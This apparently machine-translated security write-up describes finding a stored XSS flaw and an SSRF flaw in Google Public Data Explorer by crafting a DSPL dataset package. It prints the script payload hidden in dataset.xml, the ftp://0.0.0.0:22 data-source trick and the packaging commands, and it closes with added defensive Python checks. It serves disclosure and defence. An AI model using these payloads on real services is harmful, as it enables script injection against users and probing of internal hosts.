See how I construct the DSPL language pack and discover Google's storage XSS and SSRF vulnerabilities

2025-01-15 Update. From: SLTechnology News&Howtos, Network Security


Shulou (Shulou.com) 05/31 Report

This article describes how I constructed a DSPL language pack and found stored XSS and SSRF vulnerabilities in Google. The editor considers it very practical and shares it here; I hope you gain something from reading it.

The following describes how, by carefully crafting a Google Dataset Publishing Language (DSPL) package, I constructed a stored XSS vulnerability that executes in the context of www.google.com. In addition, I used DSPL's remote data source feature to reach local services (that is, SSRF).

Google's Dataset Publishing Language (DSPL)

Google Dataset Publishing Language: Google draws on its strong network data collection capabilities and has a number of applications in data mining and visualization. By building a visualization layer for commercial and public services, it makes it easy for third-party companies and individuals to collect and visualize data in full. Users can use Google's Dataset Publishing Language (DSPL) interface to link their own databases to Google's visualization tools and obtain conveniently customized personal data visualizations.

Google's Public Data Explorer is a data search and visualization tool that charts common search requests based on official data, presenting search results in a more intuitive visual form. For example, it can be used to easily collect and visualize large datasets such as government health expenditure and World Bank data.

DSPL uses XML to describe the dataset's metadata, together with CSV data files. For example, the DSPL sample.zip package looks like this:

Archive:  sample.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
      246  02-01-2018 13:19   countries.csv
      221  02-14-2011 17:13   country_slice.csv
     7812  03-04-2018 21:12   dataset.xml
      246  02-14-2011 17:13   gender_country_slice.csv
       28  01-29-2018 20:55   genders.csv
      200  02-14-2011 17:13   state_slice.csv
      300  01-29-2018 21:11   states.csv
---------                     -------
     9053                     7 files

The vulnerability

The problem is that Google's Public Data Explorer does not properly encode or validate the metadata supplied in the dataset archive before using it.

Take this dataset as an example:

curl https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/dspl/tutorial1.0.zip -o sample.zip

unzip sample.zip; rm sample.zip

You can change the value of the dataset's name in the dataset.xml file. As the following XML fragment shows, the JavaScript payload can be wrapped in a CDATA section so that it is not parsed as XML markup:

<info>
  <name>
    <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
  </name>
  <description>
    <value>Some very interesting statistics about countries</value>
  </description>
  <url>
    <value>http://google.com</value>
  </url>
</info>

After that, perform the following two steps:

zip -r poc.dspl *

Upload the crafted dataset file to Google Public Data Explorer and share it publicly.

As a result, any user who opens the dataset executes the attacker's JavaScript (for example, a Coinhive miner) in the context of www.google.com.

Vulnerability PoC testing

The following video shows a dataset package containing the malicious script being constructed; after it is uploaded and deployed, the planted script executes successfully:

http://v.youku.com/v_show/id_XMzQ3MTM0Njk0OA==.html

https://vimeo.com/258923005

Moreover, because DSPL can also retrieve data from remote HTTP or FTP sources, this feature combined with the defect above enables an SSRF attack that reaches service data on local hosts. (Taken further, it can also indirectly reach internal network systems that are isolated from the Internet, which is a further threat to the systems and devices in the target environment.)

For example, change the data source in poc.dspl/dataset.xml to the following:

ftp://0.0.0.0:22

When the dataset is uploaded and shared, the Google server returns the error-handling response of the HTTP/FTP request, which reveals the detailed SSH banner of the Google server. This is server information that should never be publicly exposed.
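The two defects above share a root cause: dataset.xml content is trusted as-is. The following checks, written for this article rather than taken from Google's code, parse a constructed dataset.xml mirroring the two modified fragments, HTML-escape the info metadata so a CDATA payload renders as text, and reject remote data sources that are not http(s) to a public address. It assumes the DSPL <info><name><value> layout and that a remote source appears as the text of a <file> element.

```python
"""Defensive checks for a DSPL dataset.xml: escape metadata (stored XSS) and
vet remote data sources (SSRF). Added example, not Google's implementation."""
import html
import ipaddress
import socket
from urllib.parse import urlparse
import xml.etree.ElementTree as ET

ALLOWED_SCHEMES = {"http", "https"}  # ftp:// and every other scheme is rejected

def _local(tag):
    """Strip the {namespace} prefix so matching works with or without the DSPL xmlns."""
    return tag.rsplit("}", 1)[-1]

def safe_metadata(xml_text):
    """Return info/* values HTML-escaped, so a CDATA <script> is shown as text."""
    root = ET.fromstring(xml_text)
    out = {}
    for info in (e for e in root.iter() if _local(e.tag) == "info"):
        for field in info:  # assumption: <name><value>..</value></name> layout
            for value in field:
                if _local(value.tag) == "value":
                    out[_local(field.tag)] = html.escape(value.text or "")
    return out

def url_is_safe(url, resolver=socket.gethostbyname):
    """Allow only http(s) to hosts that resolve to a public (non-internal) address."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        addr = ipaddress.ip_address(resolver(parts.hostname))
    except (OSError, ValueError):
        return False
    return addr.is_global  # 0.0.0.0, 127.0.0.0/8, 10/8, link-local etc. all fail

def unsafe_sources(xml_text, resolver=socket.gethostbyname):
    """List <file> entries that are remote URLs failing url_is_safe; local files pass."""
    root = ET.fromstring(xml_text)
    bad = []
    for f in (e for e in root.iter() if _local(e.tag) == "file"):  # assumption
        src = (f.text or "").strip()
        if "://" in src and not url_is_safe(src, resolver):
            bad.append(src)
    return bad

# Constructed sample mirroring the article's two modified dataset.xml fragments.
SAMPLE = """<dspl xmlns="http://schemas.google.com/dspl/2010">
  <info><name><value><![CDATA[<script>confirm(document.domain)</script>]]></value></name>
    <description><value>Some very interesting statistics about countries</value></description>
    <url><value>http://google.com</value></url></info>
  <tables><table id="countries_table"><data>
    <file format="csv" encoding="utf-8">ftp://0.0.0.0:22</file></data></table></tables>
</dspl>"""
```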

The above describes how I constructed a DSPL language pack and found Google's stored XSS and SSRF vulnerabilities. The editor believes it contains knowledge points that we may encounter or use in daily work, and hopes you can learn more from this article. For more details, please follow the industry information channel.
